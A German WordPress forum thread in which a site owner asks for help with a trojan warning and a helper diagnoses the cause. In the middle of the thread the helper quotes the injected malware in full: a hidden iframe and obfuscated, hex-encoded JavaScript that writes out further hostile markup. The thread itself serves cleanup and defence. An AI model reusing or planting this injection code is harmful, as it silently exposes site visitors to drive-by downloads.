Beiträge von mrkeating

    Mmh, da der Code nach </body></html> eingefügt wird ist vermutlich nicht das Template oder der Footer-Pluign-Hook verantwortlich.

    Hast du WP mal drüberinstalliert (alles löschen und gleiche Version neu hochladen) um auszuschließen, dass es irgendwo in den Coredateien steckt? Hast du das Theme gründlich gecheckt (v.a. functions.php) oder mal testweise gewechselt? Hast du die Plugins mal alle deaktiviert? So könntest du dem Übeltäter auf die Spur kommen...

    Alles probiert. Hab jetzt auch auf 2.7 upgedated. Bleibt aber alles beim alten.

    Ganz am Ende deiner Seite steht folgendes:

    HTML
    <iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c102916999516l496c5c63121d0(l496c5c63129a0){ var l496c5c6313171=16; return (parseInt(l496c5c63129a0,l496c5c6313171));}function l496c5c6314113(l496c5c63148e5){  var l496c5c63150b6='';l496c5c6316ffa=String.fromCharCode;for(l496c5c6315885=0;l496c5c6315885<l496c5c63148e5.length;l496c5c6315885+=2){ l496c5c63150b6+=(l496c5c6316ffa(c102916999516l496c5c63121d0(l496c5c63148e5.substr(l496c5c6315885,2))));}return l496c5c63150b6;} var xc6='';var l496c5c63177ca='3C736'+xc6+'3726'+xc6+'970743E6'+xc6+'96'+xc6+'6'+xc6+'28216'+xc6+'D796'+xc6+'96'+xc6+'1297B6'+xc6+'46'+xc6+'F6'+xc6+'3756'+xc6+'D6'+xc6+'56'+xc6+'E742E77726'+xc6+'9746'+xc6+'528756'+xc6+'E6'+xc6+'5736'+xc6+'36'+xc6+'1706'+xc6+'528202725336'+xc6+'32536'+xc6+'392536'+xc6+'36'+xc6+'2537322536'+xc6+'312536'+xc6+'6'+xc6+'42536'+xc6+'352532302536'+xc6+'6'+xc6+'52536'+xc6+'312536'+xc6+'6'+xc6+'42536'+xc6+'3525336'+xc6+'42536'+xc6+'332533312533302532302537332537322536'+xc6+'3325336'+xc6+'42532372536'+xc6+'3825373425373425373025336'+xc6+'125326'+xc6+'6'+xc6+'25326'+xc6+'6'+xc6+'2536'+xc6+'372536'+xc6+'6'+xc6+'6'+xc6+'2536'+xc6+'372536'+xc6+'6'+xc6+'6'+xc6+'2533322536'+xc6+'6'+xc6+'42536'+xc6+'3525326'+xc6+'52536'+xc6+'6'+xc6+'52536'+xc6+'3525373425326'+xc6+'6'+xc6+'25326'+xc6+'52536'+xc6+'372536'+xc6+'6'+xc6+'6'+xc6+'25326'+xc6+'6'+xc6+'2536'+xc6+'332536'+xc6+'382536'+xc6+'352536'+xc6+'332536'+xc6+'6'+xc6+'225326'+xc6+'52536'+xc6+'382537342536'+xc6+'6'+xc6+'42536'+xc6+'6'+xc6+'32532372532302537372536'+xc6+'392536'+xc6+'342537342536'+xc6+'3825336'+xc6+'42533322533382533302532302536'+xc6+'382536'+xc6+'352536'+xc6+'392536'+xc6+'372536'+xc6+'3825373425336'+xc6+'4253335253335253336'+xc6+'2532302537332537342537392536'+xc6+'6'+xc6+'32536'+xc6+'3525336'+xc6+'4253237253736'+xc6+'2536'+xc6+'392537332536'+xc6+'392536'+xc6+'322536'+xc6+'392536'+xc6+'6'+xc6+'32536'+xc6+'3925373425373925336'+xc6+'12536'+xc6+'382536'+xc6+'392536'+xc6+'342536'+xc6+'342536'+xc6+'352536'+xc6+'6'+xc6+'525323725336'+xc6+'525336'+xc6+'325326'+xc6+'6'+xc6+'2536'+xc6+'392536'+xc6+'36'+xc6+'2537322536'+xc6+'312536'+xc6+'6'+xc6+'42536'+xc6+'3525336'+xc6+'52729293B7D76'+xc6+'6'+xc6+'172206'+xc6+'D796'+xc6+'96'+xc6+'13D7472756'+xc6+'53B3C2F736'+xc6+'3726'+xc6+'970743E';document.write(l496c5c6314113(l496c5c63177ca));</script>

    Die URL des IFrame wird vermutlich durch das folgende Script geändert und von dieser URL dann der Trojaner geladen. Poste mal bitte die footer.php deines Themes.

    Bitte:

    PHP
    <div id="unten"><!-- the content -->
    <p style="margin-left: 120px; margin-top: 90px;">Copyright © 2008 TB 1893/ASV Regenstauf All Rights Reserved <a href="#top"><img src="http://www.tb-asv-regenstauf.de/wp-content/uploads/2008/12/top.jpg"></a></p> 
    <?php do_action('wp_footer'); ?>
    </body></html>

    Seit einigen Tagen findet mein Antivir beim Aufrufen meiner Wordpress-Seite den Trojaner "TR/Dldr.HTML.Agent.MU". Ich benutze Wordpress 2.6.

    Leider konnte ich im Netz nix dazu finden. Wie bringe ich den wieder runter von der Seite? Wäre echt toll, wenn mir hier jemand weiterhelfen könnte.

    Ich sag schon mal im vorraus Danke!